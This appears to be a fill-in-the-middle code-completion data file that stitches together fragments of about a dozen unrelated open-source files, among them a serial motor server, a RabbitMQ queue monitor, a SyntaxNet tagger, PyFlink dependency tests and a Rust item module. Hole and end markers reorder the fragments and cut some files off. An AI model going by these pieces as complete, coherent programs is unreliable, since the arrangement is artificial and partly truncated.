# Trim prefix NULLs and linebreaks
self.input_buffer = self.input_buffer.lstrip(chr(0x0) + "\r\n")
#print "input_buffer=%s" % repr(self.input_buffer)
if ( len(self.input_buffer) > 1
and self.input_buffer[-2:] == "\r\n"):
# Got a message, parse it (sans the CRLF) and empty the buffer
self.message_received(self.input_buffer[:-2])
self.input_buffer = ""
def message_received(self, message):
#print("DEBUG: msg=%s" % message)
try:
# Currently we have no incoming messages from this board
pass
except Exception as e:
print "message_received exception: Got exception %s" % repr(e)
# Ignore indexerrors, they just mean we could not parse the command
pass
pass
def cleanup(self):
print("Cleanup called")
self._setspeeds(0,0)
def run(self):
print("Starting motorserver")
super(motorserver, self).run()
if __name__ == "__main__":
import serial
import sys,os
port = serial.Serial(sys.argv[1], 115200, xonxoff=False, timeout=0.01)
instance = motorserver(SERVICE_NAME, SERVICE_PORT, port)
instance.run()<|fim▁end|> |
class motorserver(zmqdecorators.service):
def __init__(self, service_name, service_port, serialport):
super(motorserver, self).__init__(service_name, service_port) |
<|file_name|>applicationautoscaling.py<|end_file_name|><|fim▁begin|>"""General-use classes to interact with the ApplicationAutoScaling service through CloudFormation.
See Also:
`AWS developer guide for ApplicationAutoScaling
<https://docs.aws.amazon.com/autoscaling/application/APIReference/Welcome.html>`_
"""
# noinspection PyUnresolvedReferences<|fim▁hole|>from .._raw import applicationautoscaling as _raw
# noinspection PyUnresolvedReferences
from .._raw.applicationautoscaling import *<|fim▁end|> | |
<|file_name|>test_cleanup.py<|end_file_name|><|fim▁begin|>"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software<|fim▁hole|>limitations under the License.
"""
from mpp.models import SQLConcurrencyTestCase
'''
Cleanup sqls
'''
class TestCleanupClass(SQLConcurrencyTestCase):
'''
Cleanup sqls before the next test.
'''<|fim▁end|> | distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and |
<|file_name|>edit.py<|end_file_name|><|fim▁begin|>from zeit.cms.i18n import MessageFactory as _
from zope.cachedescriptors.property import Lazy as cachedproperty
import os.path
import zeit.cms.browser.view
import zeit.cms.content.interfaces
import zeit.cms.interfaces
import zeit.content.image.interfaces
import zeit.content.video.interfaces
import zeit.edit.browser.form
import zeit.edit.browser.landing
import zeit.edit.browser.view
import zeit.newsletter.interfaces<|fim▁hole|>class LandingZoneBase(zeit.edit.browser.landing.LandingZone):
uniqueId = zeit.edit.browser.view.Form('uniqueId')
block_type = 'teaser'
def initialize_block(self):
content = zeit.cms.interfaces.ICMSContent(self.uniqueId)
self.block.reference = content
class GroupLandingZone(LandingZoneBase):
"""Handler to drop objects to the body's landing zone."""
order = 0
class TeaserLandingZone(LandingZoneBase):
"""Handler to drop objects after other objects."""
order = 'after-context'
class Teaser(zeit.cms.browser.view.Base):
@cachedproperty
def metadata(self):
return zeit.cms.content.interfaces.ICommonMetadata(
self.context.reference, None)
@cachedproperty
def image(self):
# XXX copy&paste&tweak of zeit.content.cp.browser.blocks.teaser.Display
content = self.context.reference
if content is None:
return
if zeit.content.video.interfaces.IVideoContent.providedBy(content):
return content.thumbnail
images = zeit.content.image.interfaces.IImages(content, None)
if images is None:
preview = zope.component.queryMultiAdapter(
(content, self.request), name='preview')
if preview:
return self.url(preview)
return
if not images.image:
return
group = images.image
for name in group:
basename, ext = os.path.splitext(name)
if basename.endswith('148x84'):
image = group[name]
return self.url(image, '@@raw')
class Advertisement(zeit.cms.browser.view.Base):
@cachedproperty
def image(self):
if not self.context.image:
return
return self.url(self.context.image, '@@raw')
class GroupTitle(zeit.edit.browser.form.InlineForm):
legend = None
prefix = 'group'
undo_description = _('edit group title')
form_fields = zope.formlib.form.FormFields(
zeit.newsletter.interfaces.IGroup).select('title')
class Empty(object):
def render(self):
return u''<|fim▁end|> | import zope.formlib.form
|
<|file_name|>rabbit_queues.py<|end_file_name|><|fim▁begin|>import requests
from requests.auth import HTTPBasicAuth
def get_data(config):
auth = HTTPBasicAuth(config['authentication']['username'], config['authentication']['password'])
resp = requests.get(config['host'] + '/api/queues', auth=auth)
queues = resp.json()
data = {}
for queue in queues:
name = queue['name']
message_stats = queue.get('message_stats', {})
queue_size = queue.get('messages')
ack_rate = (message_stats.get('ack_details') or {}).get('rate')
nack_rate = (message_stats.get('redeliver_details') or {}).get('rate')<|fim▁hole|>
(inactive_threshold, active_threshold, nack_threshold) = (50, 5000, 1)
for qs_name, qs_threshold in config['queue_sizes'].items():
if name.startswith(qs_name):
(inactive_threshold, active_threshold, nack_threshold) = qs_threshold
data[name + ' queue'] = {
'state': 'FAIL' if (queue_size > inactive_threshold and (ack_rate < 2 or ack_rate is None) or queue_size > active_threshold or nack_rate > nack_threshold) else 'OK',
'message': 'size is %d, ack rate is %.2f, nack rate is %.2f' % (queue_size if queue_size else 0, ack_rate if ack_rate else 0, nack_rate if nack_rate else 0)
}
return data<|fim▁end|> | |
<|file_name|>Application.java<|end_file_name|><|fim▁begin|>package shuaicj.hello.configuration.case04;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
/**
* Spring boot application.
*
* @author shuaicj 2019/10/12
*/
@SpringBootApplication
public class Application {
public static void main(String[] args) {
SpringApplication.run(Application.class, args);<|fim▁hole|><|fim▁end|> | }
} |
<|file_name|>filters.js<|end_file_name|><|fim▁begin|>var Vue = require('vue')<|fim▁hole|>
function fixFilters() {
// 动态 filter
Vue.filter('apply', function(value, name) {
var filter = this.$options.filters[name] || Vue.options.filters[name]
var args = [value].concat(
[].slice.call(arguments, 2)
)
if (filter) return filter.apply(this, args)
return value
})
}
module.exports = fixFilters<|fim▁end|> | |
<|file_name|>tagger_transitions.cc<|end_file_name|><|fim▁begin|>/* Copyright 2016 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software<|fim▁hole|>distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
// Tagger transition system.
//
// This transition system has one type of actions:
// - The SHIFT action pushes the next input token to the stack and
// advances to the next input token, assigning a part-of-speech tag to the
// token that was shifted.
//
// The transition system operates with parser actions encoded as integers:
// - A SHIFT action is encoded as number starting from 0.
#include <string>
#include "parser_features.h"
#include "parser_state.h"
#include "parser_transitions.h"
#include "sentence_features.h"
#include "shared_store.h"
#include "task_context.h"
#include "term_frequency_map.h"
#include "utils.h"
#include "tensorflow/core/lib/strings/strcat.h"
namespace syntaxnet {
class TaggerTransitionState : public ParserTransitionState {
public:
explicit TaggerTransitionState(const TermFrequencyMap *tag_map,
const TagToCategoryMap *tag_to_category)
: tag_map_(tag_map), tag_to_category_(tag_to_category) {}
explicit TaggerTransitionState(const TaggerTransitionState *state)
: TaggerTransitionState(state->tag_map_, state->tag_to_category_) {
tag_ = state->tag_;
gold_tag_ = state->gold_tag_;
}
// Clones the transition state by returning a new object.
ParserTransitionState *Clone() const override {
return new TaggerTransitionState(this);
}
// Reads gold tags for each token.
void Init(ParserState *state) override {
tag_.resize(state->sentence().token_size(), -1);
gold_tag_.resize(state->sentence().token_size(), -1);
for (int pos = 0; pos < state->sentence().token_size(); ++pos) {
int tag = tag_map_->LookupIndex(state->GetToken(pos).tag(), -1);
gold_tag_[pos] = tag;
}
}
// Returns the tag assigned to a given token.
int Tag(int index) const {
DCHECK_GE(index, 0);
DCHECK_LT(index, tag_.size());
return index == -1 ? -1 : tag_[index];
}
// Sets this tag on the token at index.
void SetTag(int index, int tag) {
DCHECK_GE(index, 0);
DCHECK_LT(index, tag_.size());
tag_[index] = tag;
}
// Returns the gold tag for a given token.
int GoldTag(int index) const {
DCHECK_GE(index, -1);
DCHECK_LT(index, gold_tag_.size());
return index == -1 ? -1 : gold_tag_[index];
}
// Returns the string representation of a POS tag, or an empty string
// if the tag is invalid.
string TagAsString(int tag) const {
if (tag >= 0 && tag < tag_map_->Size()) {
return tag_map_->GetTerm(tag);
}
return "";
}
// Adds transition state specific annotations to the document.
void AddParseToDocument(const ParserState &state, bool rewrite_root_labels,
Sentence *sentence) const override {
for (size_t i = 0; i < tag_.size(); ++i) {
Token *token = sentence->mutable_token(i);
token->set_tag(TagAsString(Tag(i)));
if (tag_to_category_) {
token->set_category(tag_to_category_->GetCategory(token->tag()));
}
}
}
// Whether a parsed token should be considered correct for evaluation.
bool IsTokenCorrect(const ParserState &state, int index) const override {
return GoldTag(index) == Tag(index);
}
// Returns a human readable string representation of this state.
string ToString(const ParserState &state) const override {
string str;
for (int i = state.StackSize(); i > 0; --i) {
const string &word = state.GetToken(state.Stack(i - 1)).word();
if (i != state.StackSize() - 1) str.append(" ");
tensorflow::strings::StrAppend(
&str, word, "[", TagAsString(Tag(state.StackSize() - i)), "]");
}
for (int i = state.Next(); i < state.NumTokens(); ++i) {
tensorflow::strings::StrAppend(&str, " ", state.GetToken(i).word());
}
return str;
}
private:
// Currently assigned POS tags for each token in this sentence.
std::vector<int> tag_;
// Gold POS tags from the input document.
std::vector<int> gold_tag_;
// Tag map used for conversions between integer and string representations
// part of speech tags. Not owned.
const TermFrequencyMap *tag_map_ = nullptr;
// Tag to category map. Not owned.
const TagToCategoryMap *tag_to_category_ = nullptr;
TF_DISALLOW_COPY_AND_ASSIGN(TaggerTransitionState);
};
class TaggerTransitionSystem : public ParserTransitionSystem {
public:
~TaggerTransitionSystem() override { SharedStore::Release(tag_map_); }
// Determines tag map location.
void Setup(TaskContext *context) override {
input_tag_map_ = context->GetInput("tag-map", "text", "");
join_category_to_pos_ = context->GetBoolParameter("join_category_to_pos");
if (!join_category_to_pos_) {
input_tag_to_category_ = context->GetInput("tag-to-category", "text", "");
}
}
// Reads tag map and tag to category map.
void Init(TaskContext *context) override {
const string tag_map_path = TaskContext::InputFile(*input_tag_map_);
tag_map_ = SharedStoreUtils::GetWithDefaultName<TermFrequencyMap>(
tag_map_path, 0, 0);
if (!join_category_to_pos_) {
const string tag_to_category_path =
TaskContext::InputFile(*input_tag_to_category_);
tag_to_category_ =
SharedStoreUtils::GetWithDefaultName<TagToCategoryMap>(
tag_to_category_path);
}
}
// The SHIFT action uses the same value as the corresponding action type.
static ParserAction ShiftAction(int tag) { return tag; }
// The tagger transition system doesn't look at the dependency tree, so it
// allows non-projective trees.
bool AllowsNonProjective() const override { return true; }
// Returns the number of action types.
int NumActionTypes() const override { return 1; }
// Returns the number of possible actions.
int NumActions(int num_labels) const override { return tag_map_->Size(); }
// The default action for a given state is assigning the most frequent tag.
ParserAction GetDefaultAction(const ParserState &state) const override {
return ShiftAction(0);
}
// Returns the next gold action for a given state according to the
// underlying annotated sentence.
ParserAction GetNextGoldAction(const ParserState &state) const override {
if (!state.EndOfInput()) {
return ShiftAction(TransitionState(state).GoldTag(state.Next()));
}
return ShiftAction(0);
}
// Checks if the action is allowed in a given parser state.
bool IsAllowedAction(ParserAction action,
const ParserState &state) const override {
return !state.EndOfInput();
}
// Makes a shift by pushing the next input token on the stack and moving to
// the next position.
void PerformActionWithoutHistory(ParserAction action,
ParserState *state) const override {
DCHECK(!state->EndOfInput());
if (!state->EndOfInput()) {
MutableTransitionState(state)->SetTag(state->Next(), action);
state->Push(state->Next());
state->Advance();
}
}
// We are in a final state when we reached the end of the input and the stack
// is empty.
bool IsFinalState(const ParserState &state) const override {
return state.EndOfInput();
}
// Returns a string representation of a parser action.
string ActionAsString(ParserAction action,
const ParserState &state) const override {
return tensorflow::strings::StrCat("SHIFT(", tag_map_->GetTerm(action),
")");
}
// No state is deterministic in this transition system.
bool IsDeterministicState(const ParserState &state) const override {
return false;
}
// Returns a new transition state to be used to enhance the parser state.
ParserTransitionState *NewTransitionState(bool training_mode) const override {
return new TaggerTransitionState(tag_map_, tag_to_category_);
}
// Downcasts the const ParserTransitionState in ParserState to a const
// TaggerTransitionState.
static const TaggerTransitionState &TransitionState(
const ParserState &state) {
return *static_cast<const TaggerTransitionState *>(
state.transition_state());
}
// Downcasts the ParserTransitionState in ParserState to an
// TaggerTransitionState.
static TaggerTransitionState *MutableTransitionState(ParserState *state) {
return static_cast<TaggerTransitionState *>(
state->mutable_transition_state());
}
// Input for the tag map. Not owned.
TaskInput *input_tag_map_ = nullptr;
// Tag map used for conversions between integer and string representations
// part of speech tags. Owned through SharedStore.
const TermFrequencyMap *tag_map_ = nullptr;
// Input for the tag to category map. Not owned.
TaskInput *input_tag_to_category_ = nullptr;
// Tag to category map. Owned through SharedStore.
const TagToCategoryMap *tag_to_category_ = nullptr;
bool join_category_to_pos_ = false;
};
REGISTER_TRANSITION_SYSTEM("tagger", TaggerTransitionSystem);
// Feature function for retrieving the tag assigned to a token by the tagger
// transition system.
class PredictedTagFeatureFunction
: public BasicParserSentenceFeatureFunction<Tag> {
public:
PredictedTagFeatureFunction() {}
// Gets the TaggerTransitionState from the parser state and reads the assigned
// tag at the focus index. Returns -1 if the focus is not within the sentence.
FeatureValue Compute(const WorkspaceSet &workspaces, const ParserState &state,
int focus, const FeatureVector *result) const override {
if (focus < 0 || focus >= state.sentence().token_size()) return -1;
return static_cast<const TaggerTransitionState *>(state.transition_state())
->Tag(focus);
}
private:
TF_DISALLOW_COPY_AND_ASSIGN(PredictedTagFeatureFunction);
};
REGISTER_PARSER_IDX_FEATURE_FUNCTION("pred-tag", PredictedTagFeatureFunction);
} // namespace syntaxnet<|fim▁end|> | |
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|><|fim▁hole|>mod test_binary_ops_grad;
mod test_core;
mod test_optimizers;
mod test_tensor_ops_eval;
mod test_tensor_ops_grad;<|fim▁end|> | mod test_array_gen;
mod test_binary_ops_eval; |
<|file_name|>conditions.py<|end_file_name|><|fim▁begin|>'''
A condition
'''
from base import Base
from compares import const
class ComparisonMixin(object):
'''
Compare two values with a comparison utility
to denote if a change has validated.
'''
def compare(self, a, b, ctype=None):
'''
compare 'a' against 'b' for a comparison of `ctype`
by defauly ctype will compare for an exact match
'''
if ctype is None:
ctype = const.EXACT
# internal importer for core.compares.simple.
Comp = self.get_comparison_class(ctype)
# new class of
comp = Comp(self)
# perform comparison
return comp.match(a,b)
def get_comparison_class(self, compare):
'''
Return the compare class by string
'''
m = __import__('core.compares.simple', fromlist=[compare])
# print 'module', m
# print 'compare', compare
k = getattr(m, compare)
return k
class Condition(Base, ComparisonMixin):
'''
A condition perpetuates changes of an object base upon
rules applied at configuration.
'''
def __init__(self, node, attr, value=None, valid=None):
'''
A condition requires
a node (Node|String|iterable),
the attribute to monitor (String),
a value to validate condition.
Optionally `valid` callback when the condition is met
'''
self.watch = node
self.field = attr
self.target = value
self._valid_cb = valid
def valid(self):
'''
Is this condition valid
'''
vs = self._validate()
for node in vs:
val = vs[node]
if val == False: return False
return True
def get_nodes(self):
'''<|fim▁hole|> return a list of Nodes retrieved from the machine using the
`watch` attr. Each item in the `watch` iterable will be
parsed into a Node type.
'''
if isinstance(self.watch, (tuple, list,) ) is not True:
# create iterable
return [self.watch]
# is iterable
return self.watch
def _validate(self, nodes=None, field=None, ctype=None):
'''
validate the condition against the assigned node.
Returns boolean
Provide nodes as a node, a list of nodes or a string for
network aquisition.
ctype defines the comapre utility to use for validation
'''
nodes = nodes or self.get_nodes()
# attr of the node to inspect
field = field or self.field
# the value to target.
value = self.target
if len(nodes) == 0:
return (False, 'no machine node %s' % self.watch)
r = {};
# print 'nodes', nodes
for node in nodes:
# current value
v = node.get(field)
# print 'node:', v, 'cache', cv, 'ctype', ctype
c = self.compare(v, value, ctype)
r.update({ node: c })
# import pdb;pdb.set_trace()
return r<|fim▁end|> | |
<|file_name|>test_dependency.py<|end_file_name|><|fim▁begin|>################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import os
import shutil
import sys
import unittest
import uuid
from pyflink.pyflink_gateway_server import on_windows
from pyflink.table import DataTypes
from pyflink.table.udf import udf
from pyflink.testing import source_sink_utils
from pyflink.testing.test_case_utils import (PyFlinkBlinkStreamTableTestCase,
PyFlinkBlinkBatchTableTestCase,
PyFlinkStreamTableTestCase,
PyFlinkBatchTableTestCase)
class DependencyTests(object):
def test_add_python_file(self):
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
self.t_env.add_python_file(python_file_path)
def plus_two(i):
from test_dependency_manage_lib import add_two
return add_two(i)
self.t_env.register_function("add_two", udf(plus_two, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("add_two(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["3,1", "4,2", "5,3"])
class FlinkStreamDependencyTests(DependencyTests, PyFlinkStreamTableTestCase):
pass
class FlinkBatchDependencyTests(PyFlinkBatchTableTestCase):
def test_add_python_file(self):
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
self.t_env.add_python_file(python_file_path)
def plus_two(i):<|fim▁hole|> from test_dependency_manage_lib import add_two
return add_two(i)
self.t_env.register_function("add_two", udf(plus_two, DataTypes.BIGINT(),
DataTypes.BIGINT()))
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])\
.select("add_two(a), a")
result = self.collect(t)
self.assertEqual(result, ["3,1", "4,2", "5,3"])
class BlinkBatchDependencyTests(DependencyTests, PyFlinkBlinkBatchTableTestCase):
pass
class BlinkStreamDependencyTests(DependencyTests, PyFlinkBlinkStreamTableTestCase):
def test_set_requirements_without_cached_directory(self):
requirements_txt_path = os.path.join(self.tempdir, str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("cloudpickle==1.2.2")
self.t_env.set_python_requirements(requirements_txt_path)
def check_requirements(i):
import cloudpickle
assert os.path.abspath(cloudpickle.__file__).startswith(
os.environ['_PYTHON_REQUIREMENTS_INSTALL_DIR'])
return i
self.t_env.register_function("check_requirements",
udf(check_requirements, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("check_requirements(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["1,1", "2,2", "3,3"])
def test_set_requirements_with_cached_directory(self):
tmp_dir = self.tempdir
requirements_txt_path = os.path.join(tmp_dir, "requirements_txt_" + str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("python-package1==0.0.0")
requirements_dir_path = os.path.join(tmp_dir, "requirements_dir_" + str(uuid.uuid4()))
os.mkdir(requirements_dir_path)
package_file_name = "python-package1-0.0.0.tar.gz"
with open(os.path.join(requirements_dir_path, package_file_name), 'wb') as f:
import base64
# This base64 data is encoded from a python package file which includes a
# "python_package1" module. The module contains a "plus(a, b)" function.
# The base64 can be recomputed by following code:
# base64.b64encode(open("python-package1-0.0.0.tar.gz", "rb").read()).decode("utf-8")
f.write(base64.b64decode(
"H4sICNefrV0C/2Rpc3QvcHl0aG9uLXBhY2thZ2UxLTAuMC4wLnRhcgDtmVtv2jAYhnPtX2H1CrRCY+ckI"
"XEx7axuUA11u5imyICTRc1JiVnHfv1MKKWjYxwKEdPehws7xkmUfH5f+3PyqfqWpa1cjG5EKFnLbOvfhX"
"FQTI3nOPPSdavS5Pa8nGMwy3Esi3ke9wyTObbnGNQxamBSKlFQavzUryG8ldG6frpbEGx4yNmDLMp/hPy"
"P8b+6fNN613vdP1z8XdteG3+ug/17/F3Hcw1qIv5H54NUYiyUaH2SRRllaYeytkl6IpEdujI2yH2XapCQ"
"wSRJRDHt0OveZa//uUfeZonUvUO5bHo+0ZcoVo9bMhFRvGx9H41kWj447aUsR0WUq+pui8arWKggK5Jli"
"wGOo/95q79ovXi6/nfyf246Dof/n078fT9KI+X77Xx6BP83bX4Xf5NxT7dz7toO/L8OxjKgeTwpG+KcDp"
"sdQjWFVJMipYI+o0MCk4X/t2UYtqI0yPabCHb3f861XcD/Ty/+Y5nLdCzT0dSPo/SmbKsf6un+b7KV+Ls"
"W4/D/OoC9w/930P9eGwM75//csrD+Q/6P/P/k9D/oX3988Wqw1bS/tf6tR+s/m3EG/ddBqXO9XKf15C8p"
"P9k4HZBtBgzZaVW5vrfKcj+W32W82ygEB9D/Xu9+4/qfP9L/rBv0X1v87yONKRX61/qfzwqjIDzIPTbv/"
"7or3/88i0H/tfBFW7s/s/avRInQH06ieEy7tDrQeYHUdRN7wP+n/vf62LOH/pld7f9xz7a5Pfufedy0oP"
"86iJI8KxStAq6yLC4JWdbbVbWRikR2z1ZGytk5vauW3QdnBFE6XqwmykazCesAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAOBw/AJw5CHBAFAAAA=="))
self.t_env.set_python_requirements(requirements_txt_path, requirements_dir_path)
def add_one(i):
from python_package1 import plus
return plus(i, 1)
self.t_env.register_function("add_one",
udf(add_one, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("add_one(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["2,1", "3,2", "4,3"])
def test_add_python_archive(self):
tmp_dir = self.tempdir
archive_dir_path = os.path.join(tmp_dir, "archive_" + str(uuid.uuid4()))
os.mkdir(archive_dir_path)
with open(os.path.join(archive_dir_path, "data.txt"), 'w') as f:
f.write("2")
archive_file_path = \
shutil.make_archive(os.path.dirname(archive_dir_path), 'zip', archive_dir_path)
self.t_env.add_python_archive(archive_file_path, "data")
def add_from_file(i):
with open("data/data.txt", 'r') as f:
return i + int(f.read())
self.t_env.register_function("add_from_file",
udf(add_from_file, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("add_from_file(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["3,1", "4,2", "5,3"])
@unittest.skipIf(on_windows(), "Symbolic link is not supported on Windows, skipping.")
def test_set_environment(self):
python_exec = sys.executable
tmp_dir = self.tempdir
python_exec_link_path = os.path.join(tmp_dir, "py_exec")
os.symlink(python_exec, python_exec_link_path)
self.t_env.get_config().set_python_executable(python_exec_link_path)
def check_python_exec(i):
import os
assert os.environ["python"] == python_exec_link_path
return i
self.t_env.register_function("check_python_exec",
udf(check_python_exec, DataTypes.BIGINT(),
DataTypes.BIGINT()))
def check_pyflink_gateway_disabled(i):
try:
from pyflink.java_gateway import get_gateway
get_gateway()
except Exception as e:
assert str(e).startswith("It's launching the PythonGatewayServer during Python UDF"
" execution which is unexpected.")
else:
raise Exception("The gateway server is not disabled!")
return i
self.t_env.register_function("check_pyflink_gateway_disabled",
udf(check_pyflink_gateway_disabled, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("check_python_exec(a), check_pyflink_gateway_disabled(a)").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["1,1", "2,2", "3,3"])
if __name__ == "__main__":
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports')
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)<|fim▁end|> | |
<|file_name|>item.rs<|end_file_name|><|fim▁begin|>// An item is line of text that read from `find` command or stdin together with
// the internal states, such as selected or not
use std::cmp::Ordering;
use ncurses::*;
use ansi::parse_ansi;
use regex::Regex;
use reader::FieldRange;
use std::borrow::Cow;
use std::ascii::AsciiExt;
use std::sync::Arc;
macro_rules! println_stderr(
($($arg:tt)*) => { {
let r = writeln!(&mut ::std::io::stderr(), $($arg)*);
r.expect("failed printing to stderr");
} }
);
// An item will store everything that one line input will need to be operated and displayed.
//
// What's special about an item?
// The simplest version of an item is a line of string, but things are getting more complex:
// - The conversion of lower/upper case is slow in rust, because it involds unicode.
// - We may need to interpret the ANSI codes in the text.
// - The text can be transformed and limited while searching.
// About the ANSI, we made assumption that it is linewise, that means no ANSI codes will affect
// more than one line.
#[derive(Debug)]
pub struct Item {
// (num of run, number of index)
index: (usize, usize),
// The text that will be ouptut when user press `enter`
output_text: String,
// The text that will shown into the screen. Can be transformed.
text: String,
// cache of the lower case version of text. To improve speed
text_lower_chars: Vec<char>,
// the ansi state (color) of the text
ansi_states: Vec<(usize, attr_t)>,
matching_ranges: Vec<(usize, usize)>,
// For the transformed ANSI case, the output will need another transform.
using_transform_fields: bool,
ansi_enabled: bool,
}
impl<'a> Item {
pub fn new(orig_text: String,
ansi_enabled: bool,
trans_fields: &[FieldRange],
matching_fields: &[FieldRange],
delimiter: &Regex,
index: (usize, usize)) -> Self {
let using_transform_fields = trans_fields.len() > 0;
// transformed | ANSI | output<|fim▁hole|> // | |
// +- T -> trans +- F -> trans | orig
// orig | |
// +- F -> orig +- T -> ANSI ==| ANSI
// | |
// +- F -> orig | orig
let (text, states_text) = if using_transform_fields && ansi_enabled {
// ansi and transform
parse_ansi(&parse_transform_fields(delimiter, &orig_text, trans_fields))
} else if using_transform_fields {
// transformed, not ansi
(parse_transform_fields(delimiter, &orig_text, trans_fields), Vec::new())
} else if ansi_enabled {
// not transformed, ansi
parse_ansi(&orig_text)
} else {
// normal case
("".to_string(), Vec::new())
};
let mut ret = Item {
index: index,
output_text: orig_text,
text: text,
text_lower_chars: Vec::new(),
ansi_states: states_text,
using_transform_fields: trans_fields.len() > 0,
matching_ranges: Vec::new(),
ansi_enabled: ansi_enabled,
};
let lower_chars: Vec<char> = ret.get_text().to_ascii_lowercase().chars().collect();
let matching_ranges = if matching_fields.len() > 0 {
parse_matching_fields(delimiter, ret.get_text(), matching_fields)
} else {
vec![(0, lower_chars.len())]
};
ret.text_lower_chars = lower_chars;
ret.matching_ranges = matching_ranges;
ret
}
pub fn get_text(&self) -> &str {
if !self.using_transform_fields && !self.ansi_enabled {
&self.output_text
} else {
&self.text
}
}
pub fn get_output_text(&'a self) -> Cow<'a, str> {
if self.using_transform_fields && self.ansi_enabled {
let (text, _) = parse_ansi(&self.output_text);
Cow::Owned(text)
} else if !self.using_transform_fields && self.ansi_enabled {
Cow::Borrowed(&self.text)
} else {
Cow::Borrowed(&self.output_text)
}
}
pub fn get_lower_chars(&self) -> &[char] {
&self.text_lower_chars
}
pub fn get_ansi_states(&self) -> &Vec<(usize, attr_t)> {
&self.ansi_states
}
pub fn get_index(&self) -> usize {
self.index.1
}
pub fn get_full_index(&self) -> (usize, usize) {
self.index
}
pub fn get_matching_ranges(&self) -> &[(usize, usize)] {
&self.matching_ranges
}
}
impl Clone for Item {
fn clone(&self) -> Item {
Item {
index: self.index,
output_text: self.output_text.clone(),
text: self.text.clone(),
text_lower_chars: self.text_lower_chars.clone(),
ansi_states: self.ansi_states.clone(),
using_transform_fields: self.using_transform_fields,
matching_ranges: self.matching_ranges.clone(),
ansi_enabled: self.ansi_enabled,
}
}
}
fn parse_transform_fields(delimiter: &Regex, text: &str, fields: &[FieldRange]) -> String {
let mut ranges = delimiter.find_iter(text)
.map(|m| (m.start(), m.end()))
.collect::<Vec<(usize, usize)>>();
let &(_, end) = ranges.last().unwrap_or(&(0, 0));
ranges.push((end, text.len()));
let mut ret = String::new();
for field in fields {
if let Some((start, stop)) = parse_field_range(field, ranges.len()) {
let &(begin, _) = ranges.get(start).unwrap();
let &(end, _) = ranges.get(stop).unwrap_or(&(text.len(), 0));
ret.push_str(&text[begin..end]);
}
}
ret
}
fn parse_matching_fields(delimiter: &Regex, text: &str, fields: &[FieldRange]) -> Vec<(usize, usize)> {
let mut ranges = delimiter.find_iter(text)
